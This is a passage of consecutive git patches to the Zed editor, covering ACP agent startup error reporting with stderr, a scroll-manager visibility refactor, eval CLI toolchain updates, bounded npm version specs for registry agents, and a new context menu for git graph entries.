Use `utc` for UTC, or `local` for the system's local time. timezone: Timezone, } From 5c9f503877168215996c8cd33d06919c0e65c052 Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Tue, 5 May 2026 14:39:50 +0200 Subject: [PATCH 191/231] agent_servers: Include stderr in ACP startup exit errors (#55757) Previously, we weren't waiting on the status future early enough so we would just hang if we weren't able to start the agent process. I also added the recent stderr logs in there to help the user debug the issue, since it is likely relevant in these cases. image Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - acp: Improve error messages if the ACP agent fails to start. --- crates/acp_thread/src/acp_thread.rs | 3 +- crates/agent_servers/src/acp.rs | 209 +++++++++++++++++++---- crates/agent_ui/src/conversation_view.rs | 16 +- 3 files changed, 188 insertions(+), 40 deletions(-) diff --git a/crates/acp_thread/src/acp_thread.rs b/crates/acp_thread/src/acp_thread.rs index 42c6af38362fb1..a18f9f21e79b54 100644 --- a/crates/acp_thread/src/acp_thread.rs +++ b/crates/acp_thread/src/acp_thread.rs @@ -1177,6 +1177,7 @@ pub enum LoadError { FailedToInstall(SharedString), Exited { status: ExitStatus, + stderr: Option, }, Other(SharedString), } @@ -1195,7 +1196,7 @@ impl Display for LoadError { ) } LoadError::FailedToInstall(msg) => write!(f, "Failed to install: {msg}"), - LoadError::Exited { status } => write!(f, "Server exited with status {status}"), + LoadError::Exited { status, .. 
} => write!(f, "Server exited with status {status}"), LoadError::Other(msg) => write!(f, "{msg}"), } } diff --git a/crates/agent_servers/src/acp.rs b/crates/agent_servers/src/acp.rs index 832b6afe04873a..93efddb03d81db 100644 --- a/crates/agent_servers/src/acp.rs +++ b/crates/agent_servers/src/acp.rs @@ -20,7 +20,7 @@ use project::{AgentId, Project}; use remote::remote_client::Interactive; use serde::Deserialize; use std::path::PathBuf; -use std::process::Stdio; +use std::process::{ExitStatus, Stdio}; use std::rc::Rc; use std::sync::{Arc, Mutex}; use std::{any::Any, cell::RefCell, collections::VecDeque}; @@ -195,6 +195,34 @@ impl AcpDebugLog { sender.try_send(message.clone()).log_err(); } } + + fn trailing_stderr(&self) -> Option { + let state = self.state.lock().ok()?; + let mut lines = state + .messages + .iter() + .rev() + .take_while(|message| matches!(&message.message, AcpDebugMessageContent::Stderr { .. })) + .filter_map(|message| match &message.message { + AcpDebugMessageContent::Stderr { line } if !line.is_empty() => Some(line.as_ref()), + _ => None, + }) + .collect::>(); + + if lines.is_empty() { + return None; + } + + lines.reverse(); + Some(lines.join("\n")) + } +} + +fn exited_load_error_with_stderr(status: ExitStatus, debug_log: &AcpDebugLog) -> LoadError { + LoadError::Exited { + status, + stderr: debug_log.trailing_stderr().map(SharedString::from), + } } /// Awaits the response to an ACP request from a GPUI foreground task. @@ -714,6 +742,7 @@ impl AcpConnection { log::trace!("Spawned (pid: {})", child.id()); let sessions = Rc::new(RefCell::new(HashMap::default())); + let debug_log = AcpDebugLog::default(); let (release_channel, version): (Option<&str>, String) = cx.update(|cx| { ( @@ -729,7 +758,6 @@ impl AcpConnection { // Set up the foreground dispatch channel for bridging Send handler // closures to the !Send foreground thread. 
let (dispatch_tx, dispatch_rx) = mpsc::unbounded::(); - let debug_log = AcpDebugLog::default(); let incoming_lines = futures::io::BufReader::new(stdout).lines(); let tapped_incoming = incoming_lines.inspect({ @@ -756,6 +784,23 @@ impl AcpConnection { let transport = Lines::new(tapped_outgoing, tapped_incoming); + let stderr_task = cx.background_spawn({ + let debug_log = debug_log.clone(); + async move { + let mut stderr = BufReader::new(stderr); + let mut line = String::new(); + while let Ok(n) = stderr.read_line(&mut line).await + && n > 0 + { + let trimmed = line.trim_end_matches(['\n', '\r']); + log::warn!("agent stderr: {trimmed}"); + debug_log.record_line(AcpDebugMessageDirection::Stderr, trimmed); + line.clear(); + } + Ok(()) + } + }); + // `connect_client_future` installs the production handler set and // hands us back both the connection-future (to run on a background // executor) and a oneshot receiver that produces the @@ -769,9 +814,24 @@ impl AcpConnection { } }); - let connection: ConnectionTo = connection_rx + let connection_rx = async move { + connection_rx + .await + .context("Failed to receive ACP connection handle") + } + .boxed_local(); + let status_fut = child.status().boxed_local(); + let (connection, status_fut) = match futures::future::select(connection_rx, status_fut) .await - .context("Failed to receive ACP connection handle")?; + { + futures::future::Either::Left((connection, status_fut)) => (connection?, status_fut), + futures::future::Either::Right((status, _connection_rx)) => match status { + Ok(status) => return Err(exited_load_error_with_stderr(status, &debug_log).into()), + Err(err) => { + return Err(anyhow!("agent server exited before initialization: {err}")); + } + }, + }; // Set up the foreground dispatch loop to process work items from handlers. 
let dispatch_context = ClientContext { @@ -787,34 +847,7 @@ impl AcpConnection { } }); - let stderr_task = cx.background_spawn({ - let debug_log = debug_log.clone(); - async move { - let mut stderr = BufReader::new(stderr); - let mut line = String::new(); - while let Ok(n) = stderr.read_line(&mut line).await - && n > 0 - { - let trimmed = line.trim_end_matches(['\n', '\r']); - log::warn!("agent stderr: {trimmed}"); - debug_log.record_line(AcpDebugMessageDirection::Stderr, trimmed); - line.clear(); - } - Ok(()) - } - }); - - let wait_task = cx.spawn({ - let sessions = sessions.clone(); - let status_fut = child.status(); - async move |cx| { - let status = status_fut.await?; - emit_load_error_to_all_sessions(&sessions, LoadError::Exited { status }, cx); - anyhow::Ok(()) - } - }); - - let response = into_foreground_future( + let initialize_response = into_foreground_future( connection.send_request( acp::InitializeRequest::new(acp::ProtocolVersion::V1) .client_capabilities( @@ -835,12 +868,38 @@ impl AcpConnection { ), ), ) - .await?; + .map(|response| response.map_err(anyhow::Error::from)) + .boxed_local(); + let (response, status_fut) = match futures::future::select(initialize_response, status_fut) + .await + { + futures::future::Either::Left((response, status_fut)) => (response?, status_fut), + futures::future::Either::Right((status, _initialize_response)) => match status { + Ok(status) => return Err(exited_load_error_with_stderr(status, &debug_log).into()), + Err(err) => { + return Err(anyhow!("agent server exited before initialization: {err}")); + } + }, + }; if response.protocol_version < MINIMUM_SUPPORTED_VERSION { return Err(UnsupportedVersion.into()); } + let wait_task = cx.spawn({ + let sessions = sessions.clone(); + let debug_log = debug_log.clone(); + async move |cx| { + let status = status_fut.await?; + emit_load_error_to_all_sessions( + &sessions, + exited_load_error_with_stderr(status, &debug_log), + cx, + ); + anyhow::Ok(()) + } + }); + let telemetry_id 
= response .agent_info // Use the one the agent provides if we have one @@ -1881,7 +1940,10 @@ pub mod test_support { while let Ok(status) = exit_rx.recv().await { emit_load_error_to_all_sessions( &connection.sessions, - LoadError::Exited { status }, + LoadError::Exited { + status, + stderr: None, + }, cx, ); } @@ -2373,6 +2435,85 @@ mod tests { assert_eq!(task.label, "Login"); } + #[test] + fn trailing_stderr_only_uses_final_stderr_block() { + let debug_log = AcpDebugLog::default(); + debug_log.record_line(AcpDebugMessageDirection::Stderr, "stale stderr"); + debug_log.record_line( + AcpDebugMessageDirection::Incoming, + r#"{"method":"initialized"}"#, + ); + + assert_eq!(debug_log.trailing_stderr(), None); + + debug_log.record_line(AcpDebugMessageDirection::Stderr, "recent stderr"); + assert_eq!( + debug_log.trailing_stderr().as_deref(), + Some("recent stderr") + ); + } + + #[cfg(not(windows))] + #[gpui::test] + async fn startup_returns_error_when_agent_exits_before_initialization( + cx: &mut gpui::TestAppContext, + ) { + cx.update(|cx| { + let store = settings::SettingsStore::test(cx); + cx.set_global(store); + }); + cx.executor().allow_parking(); + + let temp_dir = tempfile::tempdir().unwrap(); + let project = project::Project::example([temp_dir.path()], &mut cx.to_async()).await; + let agent_server_store = + project.read_with(cx, |project, _| project.agent_server_store().downgrade()); + let command = AgentServerCommand { + path: "/bin/sh".into(), + args: vec![ + "-c".into(), + r#"printf '%s\n' 'npm error code ETARGET' 'npm error notarget No matching version found for @agentclientprotocol/claude-agent-acp@0.32.0 with a date before 4/28/2026, 12:11:38 PM.' 
>&2; exit 1"#.into(), + ], + env: None, + }; + + let mut async_cx = cx.to_async(); + let startup = AcpConnection::stdio( + AgentId::new("test-agent"), + project, + command, + agent_server_store, + None, + None, + HashMap::default(), + &mut async_cx, + ) + .fuse(); + let timeout = cx + .background_executor + .timer(std::time::Duration::from_secs(5)) + .fuse(); + futures::pin_mut!(startup, timeout); + + let result = futures::select! { + result = startup => result, + _ = timeout => panic!("timed out waiting for failed ACP startup"), + }; + + let Err(error) = result else { + panic!("expected ACP startup to fail"); + }; + let load_error = error + .downcast::() + .expect("startup failure should preserve the typed load error"); + match load_error { + LoadError::Exited { status, .. } => { + assert!(!status.success(), "expected non-zero exit status"); + } + error => panic!("expected exited load error, got: {error:?}"), + }; + } + async fn connect_fake_agent( cx: &mut gpui::TestAppContext, ) -> ( diff --git a/crates/agent_ui/src/conversation_view.rs b/crates/agent_ui/src/conversation_view.rs index c1a975939f6275..6ddac5f3f9fb73 100644 --- a/crates/agent_ui/src/conversation_view.rs +++ b/crates/agent_ui/src/conversation_view.rs @@ -2159,11 +2159,17 @@ impl ConversationView { msg.into(), Some(self.create_copy_button(msg.to_string()).into_any_element()), ), - LoadError::Exited { status } => ( - "Failed to Launch", - format!("Server exited with status {status}").into(), - None, - ), + LoadError::Exited { status, stderr } => { + let mut message = format!("Server exited with status {status}"); + if let Some(stderr) = stderr { + message.push_str("\n"); + message.push_str(stderr); + }; + let action_slot = stderr + .is_some() + .then(|| self.create_copy_button(message.clone()).into_any_element()); + ("Failed to Launch", message.into(), action_slot) + } LoadError::Other(msg) => ( "Failed to Launch", msg.into(), From 937bc396c923bab3e7bcb8b60bb70a3de67b1485 Mon Sep 17 00:00:00 2001 
From: Finn Evers Date: Tue, 5 May 2026 15:01:02 +0200 Subject: [PATCH 192/231] editor: Un-pub `ScrollManager` (#55767) Make this only pub(crate) in preparation for https://github.com/zed-industries/zed/pull/44827 Release Notes: - N/A --- crates/agent_ui/src/entry_view_state.rs | 2 +- crates/agent_ui/src/inline_assistant.rs | 2 +- crates/editor/src/editor.rs | 7 ++++++- crates/editor/src/scroll.rs | 8 ++++++++ crates/vim/src/normal/scroll.rs | 8 ++------ 5 files changed, 18 insertions(+), 9 deletions(-) diff --git a/crates/agent_ui/src/entry_view_state.rs b/crates/agent_ui/src/entry_view_state.rs index 853672142fb843..15bd9e89b57821 100644 --- a/crates/agent_ui/src/entry_view_state.rs +++ b/crates/agent_ui/src/entry_view_state.rs @@ -449,7 +449,7 @@ fn create_editor_diff( editor.set_show_vertical_scrollbar(false, cx); editor.set_minimap_visibility(MinimapVisibility::Disabled, window, cx); editor.set_soft_wrap_mode(SoftWrap::None, cx); - editor.scroll_manager.set_forbid_vertical_scroll(true); + editor.set_forbid_vertical_scroll(true); editor.set_show_indent_guides(false, cx); editor.set_read_only(true); editor.set_delegate_open_excerpts(true); diff --git a/crates/agent_ui/src/inline_assistant.rs b/crates/agent_ui/src/inline_assistant.rs index cdff9785df78b1..d442a61e01ae1d 100644 --- a/crates/agent_ui/src/inline_assistant.rs +++ b/crates/agent_ui/src/inline_assistant.rs @@ -1425,7 +1425,7 @@ impl InlineAssistant { editor.set_show_gutter(false, cx); editor.set_offset_content(false, cx); editor.disable_mouse_wheel_zoom(); - editor.scroll_manager.set_forbid_vertical_scroll(true); + editor.set_forbid_vertical_scroll(true); editor.set_read_only(true); editor.set_show_edit_predictions(Some(false), window, cx); editor.highlight_rows::( diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index af8d6f6ccc6931..d9dd6078c08953 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -1157,7 +1157,12 @@ pub struct Editor { pub display_map: 
Entity, placeholder_display_map: Option>, pub selections: SelectionsCollection, - pub scroll_manager: ScrollManager, + /// Manages the scroll position for the given editor. + /// + /// Whenever you want to modify the scroll position of the editor, you should + /// usually use the existing available APIs as opposed to directly interacting + /// with the scroll manager. + pub(crate) scroll_manager: ScrollManager, /// When inline assist editors are linked, they all render cursors because /// typing enters text into each of them, even the ones that aren't focused. pub(crate) show_cursor_when_unfocused: bool, diff --git a/crates/editor/src/scroll.rs b/crates/editor/src/scroll.rs index 143a73fd701ac9..f067519e7343f8 100644 --- a/crates/editor/src/scroll.rs +++ b/crates/editor/src/scroll.rs @@ -623,6 +623,14 @@ impl Editor { self.scroll_manager.has_autoscroll_request() } + pub fn set_forbid_vertical_scroll(&mut self, forbid: bool) { + self.scroll_manager.set_forbid_vertical_scroll(forbid); + } + + pub fn scroll_top_display_point(&self, snapshot: &DisplaySnapshot, cx: &App) -> DisplayPoint { + self.scroll_manager.scroll_top_display_point(snapshot, cx) + } + pub fn vertical_scroll_margin(&self) -> usize { self.scroll_manager.vertical_scroll_margin as usize } diff --git a/crates/vim/src/normal/scroll.rs b/crates/vim/src/normal/scroll.rs index 01719cd59325f3..befaacf31c7dac 100644 --- a/crates/vim/src/normal/scroll.rs +++ b/crates/vim/src/normal/scroll.rs @@ -109,9 +109,7 @@ impl Vim { self.update_editor(cx, |vim, editor, cx| { let should_move_cursor = editor.newest_selection_on_screen(cx).is_eq(); let display_snapshot = editor.display_map.update(cx, |map, cx| map.snapshot(cx)); - let old_top = editor - .scroll_manager - .scroll_top_display_point(&display_snapshot, cx); + let old_top = editor.scroll_top_display_point(&display_snapshot, cx); if editor.scroll_hover(amount, window, cx) { return; @@ -143,9 +141,7 @@ impl Vim { }; let display_snapshot = 
editor.display_map.update(cx, |map, cx| map.snapshot(cx)); - let top = editor - .scroll_manager - .scroll_top_display_point(&display_snapshot, cx); + let top = editor.scroll_top_display_point(&display_snapshot, cx); let vertical_scroll_margin = EditorSettings::get_global(cx).vertical_scroll_margin; let mut move_cursor = |map: &editor::display_map::DisplaySnapshot, From e0b8fcecd56df17348a6f407273e07c74777b353 Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Tue, 5 May 2026 15:40:58 +0200 Subject: [PATCH 193/231] eval_cli: Update eval_cli toolchain and pin harbor (#55768) Move `git_ui` to `agent_ui` test dependencies and bump the eval CLI Docker image to Rust 1.95.0 while pinning the Python `harbor` dependency to 0.6.4 Release Notes: - N/A --- crates/agent_ui/Cargo.toml | 2 +- crates/eval_cli/.gitignore | 1 + crates/eval_cli/Dockerfile | 4 ++-- crates/eval_cli/zed_eval/pyproject.toml | 2 +- 4 files changed, 5 insertions(+), 4 deletions(-) diff --git a/crates/agent_ui/Cargo.toml b/crates/agent_ui/Cargo.toml index 5f5a7cc7926ff5..ff34593cbc3bfa 100644 --- a/crates/agent_ui/Cargo.toml +++ b/crates/agent_ui/Cargo.toml @@ -56,7 +56,6 @@ file_icons.workspace = true fs.workspace = true futures.workspace = true git.workspace = true -git_ui.workspace = true fuzzy.workspace = true gpui.workspace = true gpui_tokio.workspace = true @@ -124,6 +123,7 @@ clock = { workspace = true, features = ["test-support"] } db = { workspace = true, features = ["test-support"] } editor = { workspace = true, features = ["test-support"] } eval_utils.workspace = true +git_ui.workspace = true gpui = { workspace = true, "features" = ["test-support"] } http_client = { workspace = true, features = ["test-support"] } indoc.workspace = true diff --git a/crates/eval_cli/.gitignore b/crates/eval_cli/.gitignore index 083ef6e3d354cb..a6317b892a1a0a 100644 --- a/crates/eval_cli/.gitignore +++ b/crates/eval_cli/.gitignore @@ -1,3 +1,4 @@ **/jobs **/*.egg-info **/__pycache__ +uv.lock diff --git 
a/crates/eval_cli/Dockerfile b/crates/eval_cli/Dockerfile index 06593a124fe61c..9782e5982b95cb 100644 --- a/crates/eval_cli/Dockerfile +++ b/crates/eval_cli/Dockerfile @@ -7,12 +7,12 @@ # Or use the helper script: # crates/eval_cli/script/build-linux -FROM rust:1.94.1 AS builder +FROM rust:1.95.0 AS builder WORKDIR /app # Pre-install the toolchain specified in rust-toolchain.toml so it is cached. -RUN rustup toolchain install 1.94.1 --profile minimal \ +RUN rustup toolchain install 1.95.0 --profile minimal \ --component rustfmt --component clippy --component rust-analyzer --component rust-src \ --target wasm32-wasip2 --target wasm32-unknown-unknown --target x86_64-unknown-linux-musl --target x86_64-unknown-linux-gnu diff --git a/crates/eval_cli/zed_eval/pyproject.toml b/crates/eval_cli/zed_eval/pyproject.toml index 416c025826eaf9..10e72028a5e7d8 100644 --- a/crates/eval_cli/zed_eval/pyproject.toml +++ b/crates/eval_cli/zed_eval/pyproject.toml @@ -3,7 +3,7 @@ name = "zed-eval" version = "0.1.0" description = "Harbor agent wrapper for Zed's eval-cli" requires-python = ">=3.12" -dependencies = ["harbor"] +dependencies = ["harbor==0.6.4"] [build-system] requires = ["setuptools"] From 6da324248abc8f5fbfc6a4a7976e282a5d635b90 Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Tue, 5 May 2026 16:12:43 +0200 Subject: [PATCH 194/231] acp: Allow resolving older npm package versions (#55770) Lots of people are using `min-release-age` in their .npmrc files these days. I saw two options: 1. Force min-release-age=0 so we can always install the latest 2. Be more lenient in what we allow I opted for 2, which means we convert `package@0.1.2` to `package@<=0.1.2`. This means npm can find the latest version we can that meets the user's requirements. 
The downside is, the registry args/env may or may not work with the resolved version, but that should at least surface better thanks to #55757 There is also the issue that npm will cache package metadata and an older version it has cached would still resolve. However, once the metadata is updated, npm does use the newer tarball at least, so it will update eventually. It's a tradeoff, but I'd rather start with this until we have a better solution on the ACP registry, rather than have users be upset becaue we installed packages in a way they didn't want. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes https://github.com/agentclientprotocol/claude-agent-acp/issues/516 Release Notes: - acp: Better support min-release-age settings for npx-based agents from the registry --- crates/project/src/agent_server_store.rs | 49 +++++++++++++++++++++++- 1 file changed, 47 insertions(+), 2 deletions(-) diff --git a/crates/project/src/agent_server_store.rs b/crates/project/src/agent_server_store.rs index 103a44197aefd0..cdde687ec63233 100644 --- a/crates/project/src/agent_server_store.rs +++ b/crates/project/src/agent_server_store.rs @@ -18,6 +18,7 @@ use rpc::{ proto::{self, ExternalExtensionAgent}, }; use schemars::JsonSchema; +use semver::Version; use serde::{Deserialize, Serialize}; use settings::{RegisterSetting, SettingsStore}; use sha2::{Digest, Sha256}; @@ -1535,7 +1536,7 @@ impl ExternalAgentServer for LocalRegistryNpxAgent { let node_runtime = self.node_runtime.clone(); let project_environment = self.project_environment.downgrade(); let registry_id = self.registry_id.clone(); - let package = self.package.clone(); + let package 
= bounded_npm_package_spec(&self.package); let args = self.args.clone(); let distribution_env = self.distribution_env.clone(); let settings_env = self.settings_env.clone(); @@ -1554,7 +1555,7 @@ impl ExternalAgentServer for LocalRegistryNpxAgent { .join(sanitize_path_component(®istry_id)); fs.create_dir(&prefix_dir).await?; - let mut exec_args = vec!["--yes".to_string(), "--".to_string(), package.to_string()]; + let mut exec_args = vec!["--yes".to_string(), "--".to_string(), package]; exec_args.extend(args); let npm_command = node_runtime @@ -1592,6 +1593,30 @@ impl ExternalAgentServer for LocalRegistryNpxAgent { } } +/// People are using min-release-age more frequently. Which means a fresh registry will likely have +/// new package versions than the user can install. +/// We set the version to now be a ceiling and not an exact pin instead. This allows npm to resolve +/// the latest version it can find that satisfies the constraint. npm seems to check regularly enough +/// that new versions are available. This does have a few downsides: +/// - The user might have an older cached version of the package that satisfies the constraint, until +/// npm checks for updates again. +/// - The registry args/env may not be valid for the resolved version. +/// +/// This is a best-effort attempt to install a version that works without overriding the user's +/// security settings, as the args don't change often. The registry will need to support this better +/// at some point, but until then, this is a best-effort workaround that hopefully solves the issue +/// for most users. 
+fn bounded_npm_package_spec(package_spec: &str) -> String { + let Some((package_name, version)) = package_spec.rsplit_once('@') else { + return package_spec.to_string(); + }; + if package_name.is_empty() || Version::parse(version).is_err() { + return package_spec.to_string(); + } + + format!("{package_name}@<={version}") +} + struct LocalCustomAgent { project_environment: Entity, command: AgentServerCommand, @@ -1996,6 +2021,26 @@ mod tests { }) } + #[test] + fn builds_bounded_npm_package_specs() { + assert_eq!( + bounded_npm_package_spec("agent-package@1.2.3"), + "agent-package@<=1.2.3" + ); + assert_eq!( + bounded_npm_package_spec("@scope/agent-package@1.2.3-beta.1"), + "@scope/agent-package@<=1.2.3-beta.1" + ); + assert_eq!( + bounded_npm_package_spec("@scope/agent-package"), + "@scope/agent-package" + ); + assert_eq!( + bounded_npm_package_spec("agent-package@latest"), + "agent-package@latest" + ); + } + #[test] fn detects_supported_archive_suffixes() { assert!(matches!( From b2168bcfee1b1402106607ee7688a3d42ec5f923 Mon Sep 17 00:00:00 2001 From: "Joseph T. Lyons" Date: Tue, 5 May 2026 10:22:50 -0400 Subject: [PATCH 195/231] Add an initial context menu to the git graph entrees (#55720) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This PR adds an initial context menu to the git graph entries. There are a bunch of commit-specific actions we will likely want to add here over time (e.g. create a branch at this commit, revert, etc.), but for this PR, it only exposes the actions that were already available from the commit details panel: `Copy SHA` and `View Commit`. We will also need a context menu to land a future want of mine: custom git command support in the git graph. This was a bit trickier than a normal context menu addition because the git graph uses the selected entry to drive the commit details panel. 
If right-clicking a row went through the normal selection path, it would also pop open the commit details panel if it was closed, or change the commit currently being shown if it was already open. I don’t think right-clicking to open a context menu should do either of those things. The context menu target and the commit details panel should be independent of one another. To support that, this PR introduces `GitGraphContextMenu`. Most of this state was already present as a tuple for rendering a context menu, but it wasn’t wired up to graph rows. I pulled that state into its own type and added an `entry_idx` field to track which row the context menu was opened on. This lets the row highlight while the menu is open without changing the selected commit or opening the details panel. This also suppresses the commit subject tooltip while the context menu is open, matching the pattern used elsewhere to avoid tooltips appearing on top of context menus. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Added a context menu the git graph entrees --- crates/git_graph/src/git_graph.rs | 230 +++++++++++++++++++++++++++--- 1 file changed, 208 insertions(+), 22 deletions(-) diff --git a/crates/git_graph/src/git_graph.rs b/crates/git_graph/src/git_graph.rs index 5a7e7a30294236..73ad9293e17318 100644 --- a/crates/git_graph/src/git_graph.rs +++ b/crates/git_graph/src/git_graph.rs @@ -11,9 +11,10 @@ use git::{ }; use git_ui::{commit_tooltip::CommitAvatar, commit_view::CommitView, git_status_icon}; use gpui::{ - Anchor, AnyElement, App, Bounds, ClickEvent, ClipboardItem, DefiniteLength, DragMoveEvent, - ElementId, Empty, Entity, 
EventEmitter, FocusHandle, Focusable, Hsla, PathBuilder, Pixels, - Point, ScrollStrategy, ScrollWheelEvent, SharedString, Subscription, Task, TextStyleRefinement, + Action, Anchor, AnyElement, App, Bounds, ClickEvent, ClipboardItem, DefiniteLength, + DismissEvent, DragMoveEvent, ElementId, Empty, Entity, EventEmitter, FocusHandle, Focusable, + Hsla, MouseButton, MouseDownEvent, PathBuilder, Pixels, Point, ScrollStrategy, + ScrollWheelEvent, SharedString, Subscription, Task, TextStyleRefinement, UniformListScrollHandle, WeakEntity, Window, actions, anchored, deferred, point, prelude::*, px, uniform_list, }; @@ -278,6 +279,8 @@ impl SplitState { actions!( git_graph, [ + /// Copies the SHA of the selected commit to the clipboard. + CopyCommitSha, /// Opens the commit view for the selected commit. OpenCommitView, /// Focuses the search field. @@ -981,13 +984,20 @@ fn compute_diff_stats(diff: &CommitDiff) -> (usize, usize) { }) } +struct GitGraphContextMenu { + menu: Entity, + position: Point, + entry_idx: usize, + _subscription: Subscription, +} + pub struct GitGraph { focus_handle: FocusHandle, search_state: SearchState, graph_data: GraphData, git_store: Entity, workspace: WeakEntity, - context_menu: Option<(Entity, Point, Subscription)>, + context_menu: Option, table_interaction_state: Entity, column_widths: Entity, selected_entry_idx: Option, @@ -1010,6 +1020,7 @@ impl GitGraph { self.search_state.matches.clear(); self.search_state.selected_index = None; self.search_state.state.next_state(); + self.context_menu = None; cx.emit(ItemEvent::Edit); cx.notify(); } @@ -1328,6 +1339,10 @@ impl GitGraph { git_store.repositories().get(&self.repo_id).cloned() } + fn has_context_menu(&self) -> bool { + self.context_menu.is_some() + } + /// Checks whether a ref name from git's `%D` decoration /// format refers to the currently checked-out branch. 
fn is_head_ref(ref_name: &str, head_branch_name: &Option) -> bool { @@ -1374,6 +1389,7 @@ impl GitGraph { }); let row_height = Self::row_height(window, cx); + let has_context_menu = self.has_context_menu(); // We fetch data outside the visible viewport to avoid loading entries when // users scroll through the git graph @@ -1481,7 +1497,9 @@ impl GitGraph { div() .id(ElementId::NamedInteger("commit-subject".into(), idx as u64)) .overflow_hidden() - .tooltip(Tooltip::text(subject)) + .when(!has_context_menu, |this| { + this.tooltip(Tooltip::text(subject)) + }) .child( h_flex() .gap_2() @@ -1851,6 +1869,96 @@ impl GitGraph { ); } + fn copy_commit_sha(&mut self, entry_index: usize, cx: &mut Context) { + let Some(commit) = self.graph_data.commits.get(entry_index) else { + return; + }; + cx.write_to_clipboard(ClipboardItem::new_string(commit.data.sha.to_string())); + } + + fn copy_selected_commit_sha( + &mut self, + _: &CopyCommitSha, + _: &mut Window, + cx: &mut Context, + ) { + let Some(selected_entry_index) = self.selected_entry_idx else { + return; + }; + self.copy_commit_sha(selected_entry_index, cx); + } + + fn deploy_entry_context_menu( + &mut self, + position: Point, + index: usize, + window: &mut Window, + cx: &mut Context, + ) { + let Some(commit) = self.graph_data.commits.get(index) else { + return; + }; + let short_sha = commit.data.sha.display_short(); + + let focus_handle = self.focus_handle.clone(); + let git_graph = cx.entity(); + let context_menu = ContextMenu::build(window, cx, |context_menu, window, _| { + context_menu + .context(focus_handle) + .header(format!("Commit {short_sha}")) + .entry( + "View Commit", + Some(OpenCommitView.boxed_clone()), + window.handler_for(&git_graph, move |this, window, cx| { + this.open_commit_view(index, window, cx); + }), + ) + .entry( + "Copy SHA", + Some(CopyCommitSha.boxed_clone()), + window.handler_for(&git_graph, move |this, _window, cx| { + this.copy_commit_sha(index, cx); + }), + ) + }); + 
self.set_context_menu(context_menu, position, index, window, cx); + } + + fn set_context_menu( + &mut self, + context_menu: Entity, + position: Point, + entry_idx: usize, + window: &mut Window, + cx: &mut Context, + ) { + window.focus(&context_menu.focus_handle(cx), cx); + + let subscription = cx.subscribe_in( + &context_menu, + window, + |this, _, _: &DismissEvent, window, cx| { + if this.context_menu.as_ref().is_some_and(|context_menu| { + context_menu + .menu + .focus_handle(cx) + .contains_focused(window, cx) + }) { + cx.focus_self(window); + } + this.context_menu.take(); + cx.notify(); + }, + ); + self.context_menu = Some(GitGraphContextMenu { + menu: context_menu, + position, + entry_idx, + _subscription: subscription, + }); + cx.notify(); + } + fn get_remote( &self, repository: &Repository, @@ -2434,6 +2542,7 @@ impl GitGraph { let hovered_entry_idx = self.hovered_entry_idx; let selected_entry_idx = self.selected_entry_idx; + let context_menu_entry_idx = self.context_menu.as_ref().map(|menu| menu.entry_idx); let is_focused = self.focus_handle.is_focused(window); let graph_canvas_bounds = self.graph_canvas_bounds.clone(); @@ -2456,8 +2565,10 @@ impl GitGraph { let absolute_row_idx = first_visible_row + visible_row_idx; let is_hovered = hovered_entry_idx == Some(absolute_row_idx); let is_selected = selected_entry_idx == Some(absolute_row_idx); + let is_context_menu_target = + context_menu_entry_idx == Some(absolute_row_idx); - if is_hovered || is_selected { + if is_hovered || is_selected || is_context_menu_target { let row_y = bounds.origin.y + visible_row_idx as f32 * row_height - vertical_scroll_offset; @@ -2469,7 +2580,11 @@ impl GitGraph { }, ); - let bg_color = if is_selected { selected_bg } else { hover_bg }; + let bg_color = if is_selected || is_context_menu_target { + selected_bg + } else { + hover_bg + }; window.paint_quad(gpui::fill(row_bounds, bg_color)); } } @@ -2697,6 +2812,31 @@ impl GitGraph { } } + fn handle_entry_click( + &mut self, + 
entry_idx: usize, + event: &ClickEvent, + scroll_strategy: ScrollStrategy, + focus_handle: Option<&FocusHandle>, + window: &mut Window, + cx: &mut Context, + ) { + // Right-clicks open the context menu, not the details panel. + if event.is_right_click() { + return; + } + + if let Some(focus_handle) = focus_handle { + focus_handle.focus(window, cx); + } + + self.select_entry(entry_idx, scroll_strategy, cx); + + if event.click_count() >= 2 { + self.open_commit_view(entry_idx, window, cx); + } + } + fn handle_graph_click( &mut self, event: &ClickEvent, @@ -2704,13 +2844,34 @@ impl GitGraph { cx: &mut Context, ) { if let Some(row) = self.row_at_position(event.position().y, window, cx) { - self.select_entry(row, ScrollStrategy::Nearest, cx); - if event.click_count() >= 2 { - self.open_commit_view(row, window, cx); - } + self.handle_entry_click(row, event, ScrollStrategy::Nearest, None, window, cx); } } + fn handle_entry_secondary_mouse_down( + &mut self, + entry_idx: usize, + event: &MouseDownEvent, + window: &mut Window, + cx: &mut Context, + ) { + self.deploy_entry_context_menu(event.position, entry_idx, window, cx); + cx.stop_propagation(); + } + + fn handle_graph_secondary_mouse_down( + &mut self, + event: &MouseDownEvent, + window: &mut Window, + cx: &mut Context, + ) { + let Some(row) = self.row_at_position(event.position.y, window, cx) else { + return; + }; + + self.handle_entry_secondary_mouse_down(row, event, window, cx); + } + fn handle_graph_scroll( &mut self, event: &ScrollWheelEvent, @@ -2905,6 +3066,8 @@ impl Render for GitGraph { let row_height = Self::row_height(window, cx); let selected_entry_idx = self.selected_entry_idx; let hovered_entry_idx = self.hovered_entry_idx; + let context_menu_entry_idx = + self.context_menu.as_ref().map(|menu| menu.entry_idx); let weak_self = cx.weak_entity(); 